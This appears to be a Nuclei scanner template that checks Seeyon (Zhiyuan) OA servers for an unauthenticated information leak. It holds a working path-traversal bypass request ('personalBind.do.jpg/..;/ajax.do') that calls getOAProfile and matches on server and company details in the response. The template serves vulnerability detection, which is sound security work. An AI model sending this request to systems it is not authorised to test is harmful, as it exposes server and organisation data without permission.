id: zhiyuan-oa-unauthorized

info:
  name: Zhiyuan Oa Unauthorized
  author: pikpikcu
  severity: low
  reference: https://buaq.net/go-53721.html
  tags: seeyon,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "serverIdentifier"
          - "companyName"
        condition: and

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
